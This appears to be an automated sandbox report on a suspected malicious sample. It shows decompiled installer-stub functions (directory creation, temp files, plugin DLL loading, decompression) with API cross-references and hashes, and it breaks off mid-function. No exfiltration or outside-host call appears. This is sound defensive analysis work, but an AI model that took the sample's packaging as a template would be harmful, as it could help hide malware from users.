                                                                                                                          				struct _SECURITY_ATTRIBUTES** _t29;
                                                                                                                          				void* _t30;
                                                                                                                          
                                                                                                                          				_t23 = __ebx;
                                                                                                                          				_t25 = E004029F6(0xfffffff0);
                                                                                                                          				_t10 = E00405564(_t25);
                                                                                                                          				_t27 = _t10;
                                                                                                                          				if(_t10 != __ebx) {
                                                                                                                          					do {
                                                                                                                          						_t29 = E004054FB(_t27, 0x5c);
                                                                                                                          						 *_t29 = _t23;
                                                                                                                          						 *((char*)(_t30 + 0xb)) =  *_t29;
                                                                                                                          						_t19 = CreateDirectoryA(_t25, _t23); // executed
                                                                                                                          						if(_t19 == 0) {
                                                                                                                          							if(GetLastError() != 0xb7) {
                                                                                                                          								L4:
                                                                                                                          								 *((intOrPtr*)(_t30 - 4)) =  *((intOrPtr*)(_t30 - 4)) + 1;
                                                                                                                          							} else {
                                                                                                                          								_t22 = GetFileAttributesA(_t25); // executed
                                                                                                                          								if((_t22 & 0x00000010) == 0) {
                                                                                                                          									goto L4;
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						_t20 =  *((intOrPtr*)(_t30 + 0xb));
                                                                                                                          						 *_t29 = _t20;
                                                                                                                          						_t27 =  &(_t29[0]);
                                                                                                                          					} while (_t20 != _t23);
                                                                                                                          				}
                                                                                                                          				if( *((intOrPtr*)(_t30 - 0x20)) == _t23) {
                                                                                                                          					_push(0xfffffff5);
                                                                                                                          					E00401423();
                                                                                                                          				} else {
                                                                                                                          					E00401423(0xffffffe6);
                                                                                                                          					E004059DD("C:\\Users\\engineer\\AppData\\Local\\Temp", _t25);
                                                                                                                          					SetCurrentDirectoryA(_t25); // executed
                                                                                                                          				}
                                                                                                                          				 *0x423f08 =  *0x423f08 +  *((intOrPtr*)(_t30 - 4));
                                                                                                                          				return 0;
                                                                                                                          			}












                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00405564: CharNextA.USER32(00405316,?,00421880,00000000,004055C8,00421880,00421880,?,?,00000000,00405316,?,"C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe" ,00000000), ref: 00405572
                                                                                                                            • Part of subcall function 00405564: CharNextA.USER32(00000000), ref: 00405577
                                                                                                                            • Part of subcall function 00405564: CharNextA.USER32(00000000), ref: 00405586
                                                                                                                          • CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015DB
                                                                                                                          • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015E5
                                                                                                                          • GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015F3
                                                                                                                          • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401622
                                                                                                                          Strings
                                                                                                                          • C:\Users\user\AppData\Local\Temp, xrefs: 00401617
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.335736473.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.335724114.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335749978.0000000000407000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335774251.0000000000422000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335781240.0000000000429000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335787934.000000000042C000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp
                                                                                                                          • API String ID: 3751793516-1104044542
                                                                                                                          • Opcode ID: eca45e4f265b5310bf3876cc38f450248989b20858a3f8b45370c7433c2b44d3
                                                                                                                          • Instruction ID: ffaaac8e814952d4dd163c137c14166a37b00a477d69e33f5cc6849720afcf5a
                                                                                                                          • Opcode Fuzzy Hash: eca45e4f265b5310bf3876cc38f450248989b20858a3f8b45370c7433c2b44d3
                                                                                                                          • Instruction Fuzzy Hash: 86010831908180ABDB116F795D44D6F27B0DA52365728473BF491B22E2C23C4942962E
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E004056E3(char _a4, intOrPtr _a6, CHAR* _a8) {
                                                                                                                          				signed int _t11;
                                                                                                                          				int _t14;
                                                                                                                          				signed int _t16;
                                                                                                                          				void* _t19;
                                                                                                                          				CHAR* _t20;
                                                                                                                          
                                                                                                                          				_t20 = _a4;
                                                                                                                          				_t19 = 0x64;
                                                                                                                          				while(1) {
                                                                                                                          					_t19 = _t19 - 1;
                                                                                                                          					_a4 = 0x61736e;
                                                                                                                          					_t11 = GetTickCount();
                                                                                                                          					_t16 = 0x1a;
                                                                                                                          					_a6 = _a6 + _t11 % _t16;
                                                                                                                          					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
                                                                                                                          					if(_t14 != 0) {
                                                                                                                          						break;
                                                                                                                          					}
                                                                                                                          					if(_t19 != 0) {
                                                                                                                          						continue;
                                                                                                                          					}
                                                                                                                          					 *_t20 =  *_t20 & 0x00000000;
                                                                                                                          					return _t14;
                                                                                                                          				}
                                                                                                                          				return _t20;
                                                                                                                          			}









                                                                                                                          APIs
                                                                                                                          • GetTickCount.KERNEL32 ref: 004056F6
                                                                                                                          • GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?), ref: 00405710
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.335736473.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.335724114.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335749978.0000000000407000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335774251.0000000000422000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335781240.0000000000429000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335787934.000000000042C000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: CountFileNameTempTick
                                                                                                                          • String ID: "C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe" $C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                          • API String ID: 1716503409-1843804530
                                                                                                                          • Opcode ID: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
                                                                                                                          • Instruction ID: 090c9869d25c952b380026dfe3028592f3e254e5657c021594612e0629f183dd
                                                                                                                          • Opcode Fuzzy Hash: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
                                                                                                                          • Instruction Fuzzy Hash: AFF0A736348204B7D7104F55EC04B9B7F5DDF91750F14C027F944DA1C0D6B1995597A5
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 94%
                                                                                                                          			E1000198F(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                                                          				void _v36;
                                                                                                                          				struct HINSTANCE__* _t34;
                                                                                                                          				intOrPtr _t38;
                                                                                                                          				void* _t44;
                                                                                                                          				void* _t45;
                                                                                                                          				void* _t46;
                                                                                                                          				void* _t50;
                                                                                                                          				intOrPtr _t53;
                                                                                                                          				signed int _t57;
                                                                                                                          				signed int _t61;
                                                                                                                          				void* _t65;
                                                                                                                          				void* _t66;
                                                                                                                          				void* _t70;
                                                                                                                          				void* _t74;
                                                                                                                          
                                                                                                                          				_t74 = __esi;
                                                                                                                          				_t66 = __edi;
                                                                                                                          				_t65 = __edx;
                                                                                                                          				 *0x10004058 = _a8;
                                                                                                                          				 *0x1000405c = _a16;
                                                                                                                          				 *0x10004060 = _a12;
                                                                                                                          				 *((intOrPtr*)(_a20 + 0xc))( *0x10004038, E1000189E);
                                                                                                                          				_push(1); // executed
                                                                                                                          				_t34 = E10001D3B(); // executed
                                                                                                                          				_t50 = _t34;
                                                                                                                          				if(_t50 == 0) {
                                                                                                                          					L28:
                                                                                                                          					return _t34;
                                                                                                                          				} else {
                                                                                                                          					if( *((intOrPtr*)(_t50 + 4)) != 1) {
                                                                                                                          						E100023F6(_t50);
                                                                                                                          					}
                                                                                                                          					E10002440(_t65, _t50);
                                                                                                                          					_t53 =  *((intOrPtr*)(_t50 + 4));
                                                                                                                          					if(_t53 == 0xffffffff) {
                                                                                                                          						L14:
                                                                                                                          						if(( *(_t50 + 0x810) & 0x00000004) == 0) {
                                                                                                                          							if( *((intOrPtr*)(_t50 + 4)) == 0) {
                                                                                                                          								_t34 = E100025FE(_t65, _t50);
                                                                                                                          							} else {
                                                                                                                          								_push(_t74);
                                                                                                                          								_push(_t66);
                                                                                                                          								_t12 = _t50 + 0x818; // 0x818
                                                                                                                          								_t57 = 8;
                                                                                                                          								memcpy( &_v36, _t12, _t57 << 2);
                                                                                                                          								_t38 = E100018A1(_t50);
                                                                                                                          								_t15 = _t50 + 0x818; // 0x818
                                                                                                                          								_t70 = _t15;
                                                                                                                          								 *((intOrPtr*)(_t50 + 0x820)) = _t38;
                                                                                                                          								 *_t70 = 3;
                                                                                                                          								E100025FE(_t65, _t50);
                                                                                                                          								_t61 = 8;
                                                                                                                          								_t34 = memcpy(_t70,  &_v36, _t61 << 2);
                                                                                                                          							}
                                                                                                                          						} else {
                                                                                                                          							E100025FE(_t65, _t50);
                                                                                                                          							_t34 = GlobalFree(E1000159E(E100018A1(_t50)));
                                                                                                                          						}
                                                                                                                          						if( *((intOrPtr*)(_t50 + 4)) != 1) {
                                                                                                                          							_t34 = E100025C4(_t50);
                                                                                                                          							if(( *(_t50 + 0x810) & 0x00000040) != 0 &&  *_t50 == 1) {
                                                                                                                          								_t34 =  *(_t50 + 0x808);
                                                                                                                          								if(_t34 != 0) {
                                                                                                                          									_t34 = FreeLibrary(_t34);
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          							if(( *(_t50 + 0x810) & 0x00000020) != 0) {
                                                                                                                          								_t34 = E10001825( *0x10004054);
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						if(( *(_t50 + 0x810) & 0x00000002) != 0) {
                                                                                                                          							goto L28;
                                                                                                                          						} else {
                                                                                                                          							return GlobalFree(_t50);
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          					_t44 =  *_t50;
                                                                                                                          					if(_t44 == 0) {
                                                                                                                          						if(_t53 != 1) {
                                                                                                                          							goto L14;
                                                                                                                          						}
                                                                                                                          						E100014C7(_t50);
                                                                                                                          						L12:
                                                                                                                          						_t50 = _t44;
                                                                                                                          						L13:
                                                                                                                          						goto L14;
                                                                                                                          					}
                                                                                                                          					_t45 = _t44 - 1;
                                                                                                                          					if(_t45 == 0) {
                                                                                                                          						L8:
                                                                                                                          						_t44 = E1000120C(_t53, _t50); // executed
                                                                                                                          						goto L12;
                                                                                                                          					}
                                                                                                                          					_t46 = _t45 - 1;
                                                                                                                          					if(_t46 == 0) {
                                                                                                                          						E100027CC(_t50);
                                                                                                                          						goto L13;
                                                                                                                          					}
                                                                                                                          					if(_t46 != 1) {
                                                                                                                          						goto L14;
                                                                                                                          					}
                                                                                                                          					goto L8;
                                                                                                                          				}
                                                                                                                          			}

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 10001D3B: GlobalFree.KERNEL32 ref: 10001F80
                                                                                                                            • Part of subcall function 10001D3B: GlobalFree.KERNEL32 ref: 10001F85
                                                                                                                            • Part of subcall function 10001D3B: GlobalFree.KERNEL32 ref: 10001F8A
                                                                                                                          • GlobalFree.KERNEL32 ref: 10001A3A
                                                                                                                          • FreeLibrary.KERNEL32(?), ref: 10001AB1
                                                                                                                          • GlobalFree.KERNEL32 ref: 10001AD6
                                                                                                                            • Part of subcall function 100023F6: GlobalAlloc.KERNEL32(00000040,E8002080), ref: 10002428
                                                                                                                            • Part of subcall function 100027CC: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,?,10001A0B,00000000), ref: 1000281C
                                                                                                                            • Part of subcall function 100018A1: lstrcpyA.KERNEL32(00000000,10004018,00000000,10001967,00000000), ref: 100018BA
                                                                                                                            • Part of subcall function 100025FE: wsprintfA.USER32 ref: 1000265F
                                                                                                                            • Part of subcall function 100025FE: GlobalFree.KERNEL32 ref: 10002728
                                                                                                                            • Part of subcall function 100025FE: GlobalFree.KERNEL32 ref: 10002751
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.337430862.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.337412850.0000000010000000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.337450406.0000000010003000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.337467323.0000000010005000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: Global$Free$Alloc$Librarylstrcpywsprintf
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1767494692-3916222277
                                                                                                                          • Opcode ID: 6e0759a576b18076926cce8c598bb7c3c4ce6d2cf8641f24577731197bddaade
                                                                                                                          • Instruction ID: 73a644c0497f06cd708a10c3248ea791f84cf5318f3d9e6ca3c0cc3a1fe5f0c9
                                                                                                                          • Opcode Fuzzy Hash: 6e0759a576b18076926cce8c598bb7c3c4ce6d2cf8641f24577731197bddaade
                                                                                                                          • Instruction Fuzzy Hash: 8031A075601245AAFB41DF649CC5BDA3BE8FF062D0F148429F9066A09FCF749845CBA2
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 60%
                                                                                                                          			E00401F51(void* __ebx, void* __eflags) {
                                                                                                                          				struct HINSTANCE__* _t18;
                                                                                                                          				struct HINSTANCE__* _t26;
                                                                                                                          				void* _t27;
                                                                                                                          				struct HINSTANCE__* _t30;
                                                                                                                          				CHAR* _t32;
                                                                                                                          				intOrPtr* _t33;
                                                                                                                          				void* _t34;
                                                                                                                          
                                                                                                                          				_t27 = __ebx;
                                                                                                                          				asm("sbb eax, 0x423f38");
                                                                                                                          				 *(_t34 - 4) = 1;
                                                                                                                          				if(__eflags < 0) {
                                                                                                                          					_push(0xffffffe7);
                                                                                                                          					L15:
                                                                                                                          					E00401423();
                                                                                                                          					L16:
                                                                                                                          					 *0x423f08 =  *0x423f08 +  *(_t34 - 4);
                                                                                                                          					return 0;
                                                                                                                          				}
                                                                                                                          				_t32 = E004029F6(0xfffffff0);
                                                                                                                          				 *(_t34 + 8) = E004029F6(1);
                                                                                                                          				if( *((intOrPtr*)(_t34 - 0x14)) == __ebx) {
                                                                                                                          					L3:
                                                                                                                          					_t18 = LoadLibraryExA(_t32, _t27, 8); // executed
                                                                                                                          					_t30 = _t18;
                                                                                                                          					if(_t30 == _t27) {
                                                                                                                          						_push(0xfffffff6);
                                                                                                                          						goto L15;
                                                                                                                          					}
                                                                                                                          					L4:
                                                                                                                          					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
                                                                                                                          					if(_t33 == _t27) {
                                                                                                                          						E00404D7B(0xfffffff7,  *(_t34 + 8));
                                                                                                                          					} else {
                                                                                                                          						 *(_t34 - 4) = _t27;
                                                                                                                          						if( *((intOrPtr*)(_t34 - 0x1c)) == _t27) {
                                                                                                                          							 *_t33( *((intOrPtr*)(_t34 - 0x34)), 0x400, 0x424000, 0x40af50, 0x409000); // executed
                                                                                                                          						} else {
                                                                                                                          							E00401423( *((intOrPtr*)(_t34 - 0x1c)));
                                                                                                                          							if( *_t33() != 0) {
                                                                                                                          								 *(_t34 - 4) = 1;
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          					if( *((intOrPtr*)(_t34 - 0x18)) == _t27 && E004034C6(_t30) != 0) {
                                                                                                                          						FreeLibrary(_t30); // executed
                                                                                                                          					}
                                                                                                                          					goto L16;
                                                                                                                          				}
                                                                                                                          				_t26 = GetModuleHandleA(_t32); // executed
                                                                                                                          				_t30 = _t26;
                                                                                                                          				if(_t30 != __ebx) {
                                                                                                                          					goto L4;
                                                                                                                          				}
                                                                                                                          				goto L3;
                                                                                                                          			}










                                                                                                                          APIs
                                                                                                                          • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00401F7C
                                                                                                                            • Part of subcall function 00404D7B: lstrlenA.KERNEL32(0041FC50,00000000,0040F020,00000000,?,?,?,?,?,?,?,?,?,00402F8B,00000000,?), ref: 00404DB4
                                                                                                                            • Part of subcall function 00404D7B: lstrlenA.KERNEL32(00402F8B,0041FC50,00000000,0040F020,00000000,?,?,?,?,?,?,?,?,?,00402F8B,00000000), ref: 00404DC4
                                                                                                                            • Part of subcall function 00404D7B: lstrcatA.KERNEL32(0041FC50,00402F8B,00402F8B,0041FC50,00000000,0040F020,00000000), ref: 00404DD7
                                                                                                                            • Part of subcall function 00404D7B: SetWindowTextA.USER32(0041FC50,0041FC50), ref: 00404DE9
                                                                                                                            • Part of subcall function 00404D7B: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404E0F
                                                                                                                            • Part of subcall function 00404D7B: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E29
                                                                                                                            • Part of subcall function 00404D7B: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E37
                                                                                                                          • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401F8C
                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00401F9C
                                                                                                                          • FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402007
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.335736473.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.335724114.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335749978.0000000000407000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335774251.0000000000422000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335781240.0000000000429000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335787934.000000000042C000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2987980305-0
                                                                                                                          • Opcode ID: 71306b1134231061c89694e0e173e72c12ff72d2ee8c3f8387a1942ab3f7262f
                                                                                                                          • Instruction ID: d4347cebb671b603d0a5d412fc90ce50d757f993dc699470b494ace3858b78d6
                                                                                                                          • Opcode Fuzzy Hash: 71306b1134231061c89694e0e173e72c12ff72d2ee8c3f8387a1942ab3f7262f
                                                                                                                          • Instruction Fuzzy Hash: 7221EE72D04216ABCF107FA4DE89A6E75B06B44359F204337F611B52E0D77C4941965E
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 69%
                                                                                                                          			E00401389(signed int _a4) {
                                                                                                                          				intOrPtr* _t6;
                                                                                                                          				void* _t8;
                                                                                                                          				void* _t10;
                                                                                                                          				signed int _t11;
                                                                                                                          				void* _t12;
                                                                                                                          				intOrPtr _t15;
                                                                                                                          				signed int _t16;
                                                                                                                          				signed int _t17;
                                                                                                                          				void* _t18;
                                                                                                                          
                                                                                                                          				_t17 = _a4;
                                                                                                                          				while(_t17 >= 0) {
                                                                                                                          					_t15 =  *0x423eb0; // 0x486e74
                                                                                                                          					_t6 = _t17 * 0x1c + _t15;
                                                                                                                          					if( *_t6 == 1) {
                                                                                                                          						break;
                                                                                                                          					}
                                                                                                                          					_push(_t6); // executed
                                                                                                                          					_t8 = E00401434(); // executed
                                                                                                                          					if(_t8 == 0x7fffffff) {
                                                                                                                          						return 0x7fffffff;
                                                                                                                          					}
                                                                                                                          					_t10 = E0040136D(_t8);
                                                                                                                          					if(_t10 != 0) {
                                                                                                                          						_t11 = _t10 - 1;
                                                                                                                          						_t16 = _t17;
                                                                                                                          						_t17 = _t11;
                                                                                                                          						_t12 = _t11 - _t16;
                                                                                                                          					} else {
                                                                                                                          						_t12 = _t10 + 1;
                                                                                                                          						_t17 = _t17 + 1;
                                                                                                                          					}
                                                                                                                          					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
                                                                                                                          						 *0x42366c =  *0x42366c + _t12;
                                                                                                                          						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42366c, 0x7530,  *0x423654), 0);
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				return 0;
                                                                                                                          			}












                                                                                                                          APIs
                                                                                                                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                          • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.335736473.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.335724114.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335749978.0000000000407000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335774251.0000000000422000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335781240.0000000000429000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335787934.000000000042C000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend
                                                                                                                          • String ID: tnH
                                                                                                                          • API String ID: 3850602802-801150485
                                                                                                                          • Opcode ID: 1c916d205157ad73d7dec8fa4d75793a4825b6d15c61c30e95467a340dd2df53
                                                                                                                          • Instruction ID: 9357c62ddf9e7b3c824d0b87f8e4bad160879ee2cb8093492041203a2cf1b2c1
                                                                                                                          • Opcode Fuzzy Hash: 1c916d205157ad73d7dec8fa4d75793a4825b6d15c61c30e95467a340dd2df53
                                                                                                                          • Instruction Fuzzy Hash: A301F431724210ABE7295B389D04B2A36ADF710355F10427BF855F66F1D67CDC028B4D
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 84%
                                                                                                                          			E00403097(void* __eflags) {
                                                                                                                          				void* _t2;
                                                                                                                          				void* _t5;
                                                                                                                          				CHAR* _t6;
                                                                                                                          
                                                                                                                          				_t6 = "C:\\Users\\engineer\\AppData\\Local\\Temp\\";
                                                                                                                          				E00405C3F(_t6);
                                                                                                                          				_t2 = E0040553D(_t6);
                                                                                                                          				if(_t2 != 0) {
                                                                                                                          					E004054D0(_t6);
                                                                                                                          					CreateDirectoryA(_t6, 0); // executed
                                                                                                                          					_t5 = E004056E3("1033", _t6); // executed
                                                                                                                          					return _t5;
                                                                                                                          				} else {
                                                                                                                          					return _t2;
                                                                                                                          				}
                                                                                                                          			}







                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00405C3F: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030A3,C:\Users\user\AppData\Local\Temp\,00000000,00403215), ref: 00405C97
                                                                                                                            • Part of subcall function 00405C3F: CharNextA.USER32(?,?,?,00000000), ref: 00405CA4
                                                                                                                            • Part of subcall function 00405C3F: CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030A3,C:\Users\user\AppData\Local\Temp\,00000000,00403215), ref: 00405CA9
                                                                                                                            • Part of subcall function 00405C3F: CharPrevA.USER32(?,?,"C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030A3,C:\Users\user\AppData\Local\Temp\,00000000,00403215), ref: 00405CB9
                                                                                                                          • CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403215), ref: 004030B8
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.335736473.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.335724114.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335749978.0000000000407000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335774251.0000000000422000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335781240.0000000000429000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335787934.000000000042C000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: Char$Next$CreateDirectoryPrev
                                                                                                                          • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                                                                                                                          • API String ID: 4115351271-3512041753
                                                                                                                          • Opcode ID: 6fc6148b77ece9d346d6d7cc43375dab10df03dac4f70bfb46dffa123947e942
                                                                                                                          • Instruction ID: 14cf73edb083f9294524d0cb591bdba299ebaa8e37fda96f2dae1f3ab35ccfa6
                                                                                                                          • Opcode Fuzzy Hash: 6fc6148b77ece9d346d6d7cc43375dab10df03dac4f70bfb46dffa123947e942
                                                                                                                          • Instruction Fuzzy Hash: 95D0C92160BD3032D66136263D0AFDF155C8F5236EFA1447BF809B61CA5B6C6A8219FF
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 99%
                                                                                                                          			E004063DD() {
                                                                                                                          				signed int _t530;
                                                                                                                          				void _t537;
                                                                                                                          				signed int _t538;
                                                                                                                          				signed int _t539;
                                                                                                                          				unsigned short _t569;
                                                                                                                          				signed int _t579;
                                                                                                                          				signed int _t607;
                                                                                                                          				void* _t627;
                                                                                                                          				signed int _t628;
                                                                                                                          				signed int _t635;
                                                                                                                          				signed int* _t643;
                                                                                                                          				void* _t644;
                                                                                                                          
                                                                                                                          				L0:
                                                                                                                          				while(1) {
                                                                                                                          					L0:
                                                                                                                          					_t530 =  *(_t644 - 0x30);
                                                                                                                          					if(_t530 >= 4) {
                                                                                                                          					}
                                                                                                                          					 *(_t644 - 0x40) = 6;
                                                                                                                          					 *(_t644 - 0x7c) = 0x19;
                                                                                                                          					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
                                                                                                                          					while(1) {
                                                                                                                          						L145:
                                                                                                                          						 *(_t644 - 0x50) = 1;
                                                                                                                          						 *(_t644 - 0x48) =  *(_t644 - 0x40);
                                                                                                                          						while(1) {
                                                                                                                          							L149:
                                                                                                                          							if( *(_t644 - 0x48) <= 0) {
                                                                                                                          								goto L155;
                                                                                                                          							}
                                                                                                                          							L150:
                                                                                                                          							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
                                                                                                                          							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
                                                                                                                          							 *(_t644 - 0x54) = _t643;
                                                                                                                          							_t569 =  *_t643;
                                                                                                                          							_t635 = _t569 & 0x0000ffff;
                                                                                                                          							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
                                                                                                                          							if( *(_t644 - 0xc) >= _t607) {
                                                                                                                          								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
                                                                                                                          								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
                                                                                                                          								_t628 = _t627 + 1;
                                                                                                                          								 *_t643 = _t569 - (_t569 >> 5);
                                                                                                                          								 *(_t644 - 0x50) = _t628;
                                                                                                                          							} else {
                                                                                                                          								 *(_t644 - 0x10) = _t607;
                                                                                                                          								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
                                                                                                                          								 *_t643 = (0x800 - _t635 >> 5) + _t569;
                                                                                                                          							}
                                                                                                                          							if( *(_t644 - 0x10) >= 0x1000000) {
                                                                                                                          								L148:
                                                                                                                          								_t487 = _t644 - 0x48;
                                                                                                                          								 *_t487 =  *(_t644 - 0x48) - 1;
                                                                                                                          								L149:
                                                                                                                          								if( *(_t644 - 0x48) <= 0) {
                                                                                                                          									goto L155;
                                                                                                                          								}
                                                                                                                          								goto L150;
                                                                                                                          							} else {
                                                                                                                          								L154:
                                                                                                                          								L146:
                                                                                                                          								if( *(_t644 - 0x6c) == 0) {
                                                                                                                          									L169:
                                                                                                                          									 *(_t644 - 0x88) = 0x18;
                                                                                                                          									L170:
                                                                                                                          									_t579 = 0x22;
                                                                                                                          									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
                                                                                                                          									_t539 = 0;
                                                                                                                          									L172:
                                                                                                                          									return _t539;
                                                                                                                          								}
                                                                                                                          								L147:
                                                                                                                          								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
